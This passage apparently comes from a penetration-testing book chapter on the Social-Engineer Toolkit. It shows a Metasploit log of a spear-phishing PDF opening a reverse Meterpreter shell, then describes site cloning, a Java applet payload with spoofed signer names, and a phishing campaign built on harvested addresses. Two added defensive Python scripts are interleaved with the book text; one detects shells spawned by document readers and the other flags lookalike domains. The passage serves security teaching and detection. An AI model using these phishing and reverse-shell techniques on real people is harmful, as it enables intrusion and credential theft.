142
Chapter 10
The target opens the PDF thinking it’s legitimate, and his system is
instantly compromised. On the attacker’s side, you see the following:
[*] Started reverse handler on 10.10.1.112:443
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (748032 bytes) to 10.10.1.102
[*] Meterpreter session 1 opened (10.10.1.112:443 -> 10.10.1.102:58087)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2976 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Bob\Desktop>
This example used a spear-phishing attack to target one user, but SET
can also be used to attack multiple targets using the “mass email” option.
You can also create customized templates that can be reused, instead of
using the prebuilt templates included in SET.
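On the defender's side, the session above leaves a recognizable host footprint: the PDF reader that opened the malicious file connects out to the handler on port 443, and the `shell` command then makes that same process spawn cmd.exe (the "Process 2976 created" line). The following script is an added example, not code from the book or from SET, that looks for that pattern in Sysmon-style process-creation and network-connection events. The event lines are constructed for the example (the PIDs and the 10.10.1.112:443 handler mirror the session above), and the set of reader process names is an assumption to be tuned for your environment.

```python
"""Detect the host-side footprint of a document-borne payload: a PDF reader that
opens an outbound connection and then spawns a command shell. Added example over
constructed Sysmon-style events; the reader process names are assumptions."""
import re

# Processes that render attacker-supplied documents and have no business launching a shell.
DOCUMENT_READERS = {"acrord32.exe", "foxitreader.exe", "winword.exe", "excel.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# 'Key=Value' pairs; a value runs until the next ' Key=' so paths with spaces survive.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line):
    """Split a 'Key=Value Key=Value' line into a dict (values may contain spaces)."""
    return dict(FIELD_RE.findall(line))


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(lines):
    """Return alerts for shells spawned by document readers.

    Severity is 'high' when the same reader process had already made an outbound
    connection (the reverse-handler pattern seen above), 'medium' otherwise.
    """
    outbound = {}      # reader Pid -> "ip:port" of its first outbound connection
    alerts = []
    for line in lines:
        ev = parse_event(line)
        image = basename(ev.get("Image", ""))
        if ev.get("EventID") == "3" and image in DOCUMENT_READERS:
            outbound.setdefault(ev["Pid"], f"{ev['DestinationIp']}:{ev['DestinationPort']}")
        elif ev.get("EventID") == "1":
            parent = basename(ev.get("ParentImage", ""))
            if parent in DOCUMENT_READERS and image in SHELLS:
                alerts.append({
                    "rule": "document_reader_spawned_shell",
                    "pid": ev["Pid"],
                    "parent_pid": ev["ParentPid"],
                    "chain": f"{parent} -> {image}",
                    "callback": outbound.get(ev["ParentPid"]),
                    "severity": "high" if ev["ParentPid"] in outbound else "medium",
                })
    return alerts


# Constructed sample loosely modelled on Sysmon EventID 1 (process create) and
# EventID 3 (network connect). The browser events are benign noise the rule must ignore.
SAMPLE_EVENTS = [
    r"EventID=1 Pid=2440 Image=C:\Program Files\Adobe\Reader\AcroRd32.exe ParentPid=1800 ParentImage=C:\WINDOWS\explorer.exe",
    r"EventID=3 Pid=2440 Image=C:\Program Files\Adobe\Reader\AcroRd32.exe DestinationIp=10.10.1.112 DestinationPort=443",
    r"EventID=1 Pid=2976 Image=C:\WINDOWS\system32\cmd.exe ParentPid=2440 ParentImage=C:\Program Files\Adobe\Reader\AcroRd32.exe",
    r"EventID=1 Pid=3100 Image=C:\Program Files\Internet Explorer\iexplore.exe ParentPid=1800 ParentImage=C:\WINDOWS\explorer.exe",
    r"EventID=3 Pid=3100 Image=C:\Program Files\Internet Explorer\iexplore.exe DestinationIp=198.51.100.7 DestinationPort=443",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Run as-is it prints one alert: cmd.exe (PID 2976) spawned by AcroRd32.exe (PID 2440), rated high because that reader had already connected to 10.10.1.112:443. A reader making an outbound connection on its own is too noisy to alert on (update checks, online forms), which is why the script only uses it to raise the severity of the parent/child rule rather than as a rule of its own.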
Web Attack Vectors
Web attack vectors are probably one of the most advanced and exciting
aspects of SET, because they are specifically crafted to be believable and
enticing to the target. SET can clone websites that look identical to trusted
sites, helping to ensure that the target will think he is visiting a legitimate site.
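A cloned site can copy the page pixel for pixel, but it still has to be served from a domain the attacker controls, and that domain is usually chosen to look like the real one. The script below is an added example, not part of the book or of SET, that triages a list of observed domains (from a newly-registered-domain feed or DNS logs, say) for names that imitate a protected domain: same label under another TLD, visually confusable characters, small typos, the brand embedded in a longer label, or the whole real domain used as a subdomain. The protected domain `example.com` and the candidate list are constructed for the example, and the simple two-label split stands in for a real public-suffix lookup.

```python
"""Lookalike-domain triage: flag observed domains that imitate a protected domain.
Added example with constructed data; PROTECTED is an assumed organisation domain."""

PROTECTED = ["example.com"]          # assumption: the organisation's real domain

# Character pairs commonly substituted to mimic a name in a browser address bar.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"),
               ("1", "l"), ("3", "e"), ("5", "s")]


def normalize(label):
    """Collapse common visual substitutions so 'exarnple' compares equal to 'example'."""
    label = label.lower()
    for fake, real in CONFUSABLES:
        label = label.replace(fake, real)
    return label


def levenshtein(a, b):
    """Edit distance; a swap of two adjacent letters costs 2 under this metric."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(domain):
    """(second-level label, tld) for a plain name; assumption: no public-suffix list."""
    parts = domain.lower().strip(".").split(".")
    if len(parts) < 2:
        return parts[0], ""
    return parts[-2], parts[-1]


def classify(candidate, protected=PROTECTED, max_distance=2):
    """Return why `candidate` resembles a protected domain, or None if it does not."""
    candidate = candidate.lower().strip(".")
    c_label, _ = registrable(candidate)
    for real in protected:
        if candidate == real or candidate.endswith("." + real):
            return None                                  # the genuine domain or a subdomain of it
        r_label, _ = registrable(real)
        if real in candidate:
            return f"embeds {real} as a subdomain"       # example.com.login-update.net
        if c_label == r_label:
            return f"tld swap of {real}"                 # example.net
        if normalize(c_label) == normalize(r_label):
            return f"homoglyph of {real}"                # exarnple.com, examp1e.com
        distance = levenshtein(c_label, r_label)
        if distance <= max_distance:
            return f"edit distance {distance} from {real}"   # exmaple.com
        if r_label in c_label:
            return f"contains brand label of {real}"     # example-login.com
    return None


def scan(candidates, protected=PROTECTED):
    """Map each suspicious candidate to its reason; genuine and unrelated names are omitted."""
    hits = {}
    for name in candidates:
        reason = classify(name, protected)
        if reason:
            hits[name] = reason
    return hits


# Constructed sample: names as they might appear in a domain-registration feed or DNS log.
SAMPLE_DOMAINS = [
    "mail.example.com", "examp1e.com", "exarnple.com", "example.net",
    "exmaple.com", "example-login.com", "example.com.login-update.net", "unrelated.org",
]

if __name__ == "__main__":
    for name, reason in scan(SAMPLE_DOMAINS).items():
        print(f"{name:32} {reason}")
```

Of the eight sample names, six are flagged; `mail.example.com` is recognised as a genuine subdomain and `unrelated.org` is ignored. The checks are ordered from most to least specific so that a name gets the most precise reason that applies, and `max_distance` is the knob to adjust if short brand labels produce too many edit-distance hits.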
Java Applet
The Java applet attack is one of the most successful attack vectors in SET. The
applet itself was created by one of the SET developers, Thomas Werth. This
attack introduces a malicious Java applet that does smart browser detection
(so your exploit works) and delivers a payload to a target’s machine. The Java
applet attack is not considered a vulnerability by Java. When a target browses
the malicious site, he is presented with a warning asking if he wants to run an
untrusted Java applet. Because Java allows you to sign an applet with any name
you choose, you could call the publisher Google, Microsoft, or any other
string you choose. By editing the set_config file and setting WEBATTACK_EMAIL
to ON, you can also incorporate mass emails with this attack.
Let’s walk through a real-world example—a penetration test performed
for a Fortune 1000 company. First, a copycat domain name, similar to that of
the actual company website, was registered. Next, the attacker scraped the
Internet looking for @<company>.com email addresses using the harvester
module within Metasploit. After extracting 200 email addresses from public
websites, mass emails were sent to these addresses. The attack email claimed
to be from the company’s communications department and asked the employee